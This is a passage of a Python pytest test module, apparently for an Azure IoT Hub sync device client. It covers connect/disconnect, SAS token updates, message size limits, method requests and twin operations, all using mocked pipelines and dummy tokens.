client_exceptions.ClientError,
id="ProtocolProxyError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.connect,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.connect()
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientDisconnectTests(WaitsForEventCompletion):
@pytest.mark.it(
"Runs a 'disconnect' pipeline operation, stops the receiver handlers, then runs a second 'disconnect' pipeline operation"
)
def test_calls_pipeline_disconnect(self, mocker, client, mqtt_pipeline):
manager_mock = mocker.MagicMock()
client._handler_manager = mocker.MagicMock()
manager_mock.attach_mock(mqtt_pipeline.disconnect, "disconnect")
manager_mock.attach_mock(client._handler_manager.stop, "stop")
client.disconnect()
assert mqtt_pipeline.disconnect.call_count == 2
assert client._handler_manager.stop.call_count == 1
assert manager_mock.mock_calls == [
mocker.call.disconnect(callback=mocker.ANY),
mocker.call.stop(receiver_handlers_only=True),
mocker.call.disconnect(callback=mocker.ANY),
]
@pytest.mark.it(
"Waits for the completion of both 'disconnect' pipeline operations before returning"
)
def test_waits_for_pipeline_op_completion(self, mocker, client, mqtt_pipeline):
cb_mock1 = mocker.MagicMock()
cb_mock2 = mocker.MagicMock()
mocker.patch("azure.iot.device.iothub.sync_clients.EventedCallback").side_effect = [
cb_mock1,
cb_mock2,
]
client.disconnect()
# Disconnect called twice
assert mqtt_pipeline.disconnect.call_count == 2
# Assert callbacks sent to pipeline
assert mqtt_pipeline.disconnect.call_args_list[0][1]["callback"] is cb_mock1
assert mqtt_pipeline.disconnect.call_args_list[1][1]["callback"] is cb_mock2
# Assert callback completions were waited upon
assert cb_mock1.wait_for_completion.call_count == 1
assert cb_mock2.wait_for_completion.call_count == 1
@pytest.mark.it(
"Raises a client error if the `disconnect` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.disconnect,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.disconnect()
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientUpdateSasTokenTests(WaitsForEventCompletion):
# NOTE: Classes that inherit from this class must define some additional fixtures not included
# here, which will be specific to a device or module:
# - sas_config: returns an IoTHubPipelineConfiguration configured for Device/Module
# - uri: A uri that matches the uri in the SAS from sas_token_string fixture
# - nonmatching_uri: A uri that does NOT match to the uri in the SAS from sas_token_string
# - invalid_uri: A uri that is invalid (poorly formed, missing data, etc.)
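# For example, the device-flavoured implementations later in this module define them roughly as:
#
#   @pytest.fixture
#   def uri(self, hostname, device_id):
#       return "{hostname}/devices/{device_id}".format(hostname=hostname, device_id=device_id)
#
# (see TestIoTHubDeviceClientUpdateSasToken below).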
@pytest.fixture
def device_id(self, sas_token_string):
# NOTE: This is kind of unconventional, but this is the easiest way to extract the
# device id from a sastoken string
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
device_id = token_uri_pieces[2]
return device_id
@pytest.fixture
def hostname(self, sas_token_string):
# NOTE: This is kind of unconventional, but this is the easiest way to extract the
# hostname from a sastoken string
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
hostname = token_uri_pieces[0]
return hostname
@pytest.fixture
def sas_client(self, client_class, mqtt_pipeline, http_pipeline, sas_config):
"""Client configured as if using user-provided, non-renewable SAS auth"""
mqtt_pipeline.pipeline_configuration = sas_config
http_pipeline.pipeline_configuration = sas_config
return client_class(mqtt_pipeline, http_pipeline)
@pytest.fixture
def sas_client_manual_cb(
self, client_class, mqtt_pipeline_manual_cb, http_pipeline_manual_cb, sas_config
):
mqtt_pipeline_manual_cb.pipeline_configuration = sas_config
http_pipeline_manual_cb.pipeline_configuration = sas_config
return client_class(mqtt_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def new_sas_token_string(self, uri):
# New SASToken String that matches old device id and hostname
signature = "AvCQCS7uVk8Lxau7rBs/jek4iwENIwLwpEV7NIJySc0="
new_token_string = "SharedAccessSignature sr={uri}&sig={signature}&se={expiry}".format(
uri=urllib.parse.quote(uri, safe=""),
signature=urllib.parse.quote(signature, safe=""),
expiry=int(time.time()) + 3600,
)
return new_token_string
@pytest.mark.it(
"Creates a new NonRenewableSasToken and sets it on the PipelineConfig, if the new SAS Token string matches the existing SAS Token's information"
)
def test_updates_token_if_match_vals(self, sas_client, new_sas_token_string):
old_sas_token_string = str(sas_client._mqtt_pipeline.pipeline_configuration.sastoken)
# Update to new token
sas_client.update_sastoken(new_sas_token_string)
# Sastoken was updated
assert (
str(sas_client._mqtt_pipeline.pipeline_configuration.sastoken) == new_sas_token_string
)
assert (
str(sas_client._mqtt_pipeline.pipeline_configuration.sastoken) != old_sas_token_string
)
@pytest.mark.it("Begins a 'reauthorize connection' pipeline operation")
def test_calls_pipeline_reauthorize(self, sas_client, new_sas_token_string, mqtt_pipeline):
sas_client.update_sastoken(new_sas_token_string)
assert mqtt_pipeline.reauthorize_connection.call_count == 1
@pytest.mark.it(
"Waits for the completion of the 'reauthorize connection' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, sas_client_manual_cb, mqtt_pipeline_manual_cb, new_sas_token_string
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.reauthorize_connection
)
sas_client_manual_cb.update_sastoken(new_sas_token_string)
@pytest.mark.it(
"Raises a ClientError if the 'reauthorize connection' pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
sas_client_manual_cb,
mqtt_pipeline_manual_cb,
new_sas_token_string,
client_error,
pipeline_error,
):
# NOTE: If/When the MQTT pipeline is updated so that the reauthorize op waits for
# reconnection in order to return (currently it just waits for the disconnect),
# there will need to be additional connect-related errors in the parametrization.
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.reauthorize_connection,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
sas_client_manual_cb.update_sastoken(new_sas_token_string)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Raises a ClientError if the client was created with an X509 certificate instead of SAS"
)
def test_created_with_x509(self, mocker, sas_client, new_sas_token_string):
# Modify client to seem as if created with X509
x509_client = sas_client
x509_client._mqtt_pipeline.pipeline_configuration.sastoken = None
x509_client._mqtt_pipeline.pipeline_configuration.x509 = mocker.MagicMock()
with pytest.raises(client_exceptions.ClientError):
x509_client.update_sastoken(new_sas_token_string)
@pytest.mark.it(
"Raises a ClientError if the client was created with a renewable, non-user provided SAS (e.g. from connection string, symmetric key, etc.)"
)
def test_created_with_renewable_sas(self, mocker, uri, sas_client, new_sas_token_string):
# Modify client to seem as if created with renewable SAS
mock_signing_mechanism = mocker.MagicMock()
mock_signing_mechanism.sign.return_value = "ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI="
renewable_token = st.RenewableSasToken(uri, mock_signing_mechanism)
sas_client._mqtt_pipeline.pipeline_configuration.sastoken = renewable_token
# Client fails
with pytest.raises(client_exceptions.ClientError):
sas_client.update_sastoken(new_sas_token_string)
@pytest.mark.it("Raises a ValueError if there is an error creating a new NonRenewableSasToken")
def test_token_error(self, mocker, sas_client, new_sas_token_string):
# NOTE: specific inputs that could cause this are tested in the sastoken test module
sastoken_mock = mocker.patch.object(st.NonRenewableSasToken, "__init__")
token_err = st.SasTokenError("Some SasToken failure")
sastoken_mock.side_effect = token_err
with pytest.raises(ValueError) as e_info:
sas_client.update_sastoken(new_sas_token_string)
assert e_info.value.__cause__ is token_err
@pytest.mark.it("Raises ValueError if the provided SAS token string has already expired")
def test_expired_token(self, mocker, uri, sas_client, hostname, device_id):
sastoken_str = "SharedAccessSignature sr={resource}&sig={signature}&se={expiry}".format(
resource=urllib.parse.quote(uri, safe=""),
signature=urllib.parse.quote("ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI=", safe=""),
expiry=int(time.time() - 3600), # expired
)
with pytest.raises(ValueError):
sas_client.update_sastoken(sastoken_str)
@pytest.mark.it(
"Raises ValueError if the provided SAS token string does not match the previous SAS details"
)
def test_nonmatching_uri_in_new_token(self, sas_client, nonmatching_uri):
signature = "AvCQCS7uVk8Lxau7rBs/jek4iwENIwLwpEV7NIJySc0="
sastoken_str = "SharedAccessSignature sr={uri}&sig={signature}&se={expiry}".format(
uri=urllib.parse.quote(nonmatching_uri, safe=""),
signature=urllib.parse.quote(signature),
expiry=int(time.time()) + 3600,
)
with pytest.raises(ValueError):
sas_client.update_sastoken(sastoken_str)
@pytest.mark.it("Raises ValueError if the provided SAS token string has an invalid URI")
def test_raises_value_error_invalid_uri(self, mocker, sas_client, invalid_uri):
sastoken_str = "SharedAccessSignature sr={resource}&sig={signature}&se={expiry}".format(
resource=urllib.parse.quote(invalid_uri, safe=""),
signature=urllib.parse.quote("ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI=", safe=""),
expiry=int(time.time() + 3600),
)
with pytest.raises(ValueError):
sas_client.update_sastoken(sastoken_str)
class SharedClientSendD2CMessageTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_message' MQTTPipeline operation")
def test_calls_pipeline_send_message(self, client, mqtt_pipeline, message):
client.send_message(message)
assert mqtt_pipeline.send_message.call_count == 1
assert mqtt_pipeline.send_message.call_args[0][0] is message
@pytest.mark.it(
"Waits for the completion of the 'send_message' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, message
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.send_message
)
client_manual_cb.send_message(message)
@pytest.mark.it(
"Raises a client error if the `send_message` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.NoConnectionError,
client_exceptions.NoConnectionError,
id="NoConnectionError->NoConnectionError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
message,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.send_message,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.send_message(message)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Wraps 'message' input parameter in a Message object if it is not a Message object"
)
@pytest.mark.parametrize(
"message_input",
[
pytest.param("message", id="String input"),
pytest.param(222, id="Integer input"),
pytest.param(object(), id="Object input"),
pytest.param(None, id="None input"),
pytest.param([1, "str"], id="List input"),
pytest.param({"a": 2}, id="Dictionary input"),
],
)
def test_wraps_data_in_message_and_calls_pipeline_send_message(
self, client, mqtt_pipeline, message_input
):
client.send_message(message_input)
assert mqtt_pipeline.send_message.call_count == 1
sent_message = mqtt_pipeline.send_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == message_input
@pytest.mark.it("Raises error when message data size is greater than 256 KB")
def test_raises_error_when_message_data_greater_than_256(self, client, mqtt_pipeline):
data_input = "serpensortia" * 25600
message = Message(data_input)
with pytest.raises(ValueError) as e_info:
client.send_message(message)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_message.call_count == 0
@pytest.mark.it("Raises error when message size is greater than 256 KB")
def test_raises_error_when_message_size_greater_than_256(self, client, mqtt_pipeline):
data_input = "serpensortia"
message = Message(data_input)
message.custom_properties["spell"] = data_input * 25600
with pytest.raises(ValueError) as e_info:
client.send_message(message)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_message.call_count == 0
@pytest.mark.it("Does not raises error when message data size is equal to 256 KB")
def test_raises_error_when_message_data_equal_to_256(self, client, mqtt_pipeline):
data_input = "a" * 262095
message = Message(data_input)
# This check exists because the Message class may change its default content type encoding,
# which would alter the size calculation above.
# A greater-than check is used for Python 2 compatibility; ideally this would be a not-equal check.
if message.get_size() > device_constant.TELEMETRY_MESSAGE_SIZE_LIMIT:
assert False
client.send_message(message)
assert mqtt_pipeline.send_message.call_count == 1
sent_message = mqtt_pipeline.send_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == data_input
class SharedClientReceiveMethodRequestTests(object):
@pytest.mark.it("Implicitly enables methods feature if not already enabled")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_enables_methods_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline, method_name
):
mocker.patch.object(SyncClientInbox, "get") # patch this so receive_method_request won't block
# Verify Methods enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
False # Method Requests will appear disabled
)
client.receive_method_request(method_name)
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.METHODS
mqtt_pipeline.enable_feature.reset_mock()
# Verify Methods not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
True # Method Requests will appear enabled
)
client.receive_method_request(method_name)
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it(
"Returns a MethodRequest from the generic method inbox, if available, when called without method name"
)
def test_called_without_method_name_returns_method_request_from_generic_method_inbox(
self, mocker, client
):
request = MethodRequest(request_id="1", name="some_method", payload={"key": "value"})
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = request
manager_get_inbox_mock = mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
received_request = client.receive_method_request()
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(None)
assert inbox_mock.get.call_count == 1
assert received_request is request
@pytest.mark.it(
"Returns MethodRequest from the corresponding method inbox, if available, when called with a method name"
)
def test_called_with_method_name_returns_method_request_from_named_method_inbox(
self, mocker, client
):
method_name = "some_method"
request = MethodRequest(request_id="1", name=method_name, payload={"key": "value"})
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = request
manager_get_inbox_mock = mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
received_request = client.receive_method_request(method_name)
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(method_name)
assert inbox_mock.get.call_count == 1
assert received_request is request
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_method_request_can_be_called_in_mode(
self, mocker, client, block, timeout, method_name
):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_receive_method_request_default_mode(self, mocker, client, method_name):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
client.receive_method_request(method_name=method_name)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a method request is available, in blocking mode")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_no_method_request_in_inbox_blocking_mode(self, client, method_name):
request = MethodRequest(request_id="1", name=method_name, payload={"key": "value"})
inbox = client._inbox_manager.get_method_request_inbox(method_name)
assert inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
inbox.put(request)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_request = client.receive_method_request(method_name, block=True)
assert received_request is request
# This proves that the blocking happens because 'received_request' can't be
# 'request' until after a 10 millisecond delay on the insert. But because the
# 'received_request' IS 'request', it means that client.receive_method_request
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_times_out_waiting_for_message_blocking_mode(self, client, method_name):
result = client.receive_method_request(method_name, block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_no_message_in_inbox_nonblocking_mode(self, client, method_name):
result = client.receive_method_request(method_name, block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, method_name, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_method_request_inbox", return_value=inbox_mock
)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, method_name, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_method_request_inbox", return_value=inbox_mock
)
client._receive_type = RECEIVE_TYPE_API
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(
self, mocker, client, mqtt_pipeline, method_name, block, timeout
):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_method_request_inbox", return_value=inbox_mock
)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
class SharedClientSendMethodResponseTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_method_response' pipeline operation")
def test_send_method_response_calls_pipeline(self, client, mqtt_pipeline, method_response):
client.send_method_response(method_response)
assert mqtt_pipeline.send_method_response.call_count == 1
assert mqtt_pipeline.send_method_response.call_args[0][0] is method_response
@pytest.mark.it(
"Waits for the completion of the 'send_method_response' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, method_response
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.send_method_response
)
client_manual_cb.send_method_response(method_response)
@pytest.mark.it(
"Raises a client error if the `send_method_response` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.NoConnectionError,
client_exceptions.NoConnectionError,
id="NoConnectionError->NoConnectionError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
method_response,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.send_method_response,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.send_method_response(method_response)
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientGetTwinTests(WaitsForEventCompletion):
@pytest.fixture
def patch_get_twin_to_return_fake_twin(self, fake_twin, mocker, mqtt_pipeline):
def immediate_callback(callback):
callback(twin=fake_twin)
mocker.patch.object(mqtt_pipeline, "get_twin", side_effect=immediate_callback)
@pytest.mark.it("Implicitly enables twin messaging feature if not already enabled")
def test_enables_twin_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline, patch_get_twin_to_return_fake_twin, fake_twin
):
# Verify twin enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False # twin will appear disabled
client.get_twin()
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.TWIN
mqtt_pipeline.enable_feature.reset_mock()
# Verify twin not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # twin will appear enabled
client.get_twin()
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Begins a 'get_twin' pipeline operation")
def test_get_twin_calls_pipeline(self, client, mqtt_pipeline):
client.get_twin()
assert mqtt_pipeline.get_twin.call_count == 1
@pytest.mark.it(
"Waits for the completion of the 'get_twin' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, fake_twin
):
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.get_twin,
kwargs={"twin": fake_twin},
)
client_manual_cb.get_twin()
@pytest.mark.it(
"Raises a client error if the `get_twin` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.NoConnectionError,
client_exceptions.NoConnectionError,
id="NoConnectionError->NoConnectionError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.get_twin,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.get_twin()
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it("Returns the twin that the pipeline returned")
def test_verifies_twin_returned(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, fake_twin
):
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.get_twin,
kwargs={"twin": fake_twin},
)
returned_twin = client_manual_cb.get_twin()
assert returned_twin == fake_twin
class SharedClientPatchTwinReportedPropertiesTests(WaitsForEventCompletion):
@pytest.mark.it("Implicitly enables twin messaging feature if not already enabled")
def test_enables_twin_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline, twin_patch_reported
):
# patch this so patch_twin_reported_properties won't block
def immediate_callback(patch, callback):
callback()
mocker.patch.object(
mqtt_pipeline, "patch_twin_reported_properties", side_effect=immediate_callback
)
# Verify twin enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False # twin will appear disabled
client.patch_twin_reported_properties(twin_patch_reported)
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.TWIN
mqtt_pipeline.enable_feature.reset_mock()
# Verify twin not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # twin will appear enabled
client.patch_twin_reported_properties(twin_patch_reported)
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Begins a 'patch_twin_reported_properties' pipeline operation")
def test_patch_twin_reported_properties_calls_pipeline(
self, client, mqtt_pipeline, twin_patch_reported
):
client.patch_twin_reported_properties(twin_patch_reported)
assert mqtt_pipeline.patch_twin_reported_properties.call_count == 1
assert (
mqtt_pipeline.patch_twin_reported_properties.call_args[1]["patch"]
is twin_patch_reported
)
@pytest.mark.it(
"Waits for the completion of the 'patch_twin_reported_properties' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, twin_patch_reported
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.patch_twin_reported_properties
)
client_manual_cb.patch_twin_reported_properties(twin_patch_reported)
@pytest.mark.it(
"Raises a client error if the `patch_twin_reported_properties` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.NoConnectionError,
client_exceptions.NoConnectionError,
id="NoConnectionError->NoConnectionError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
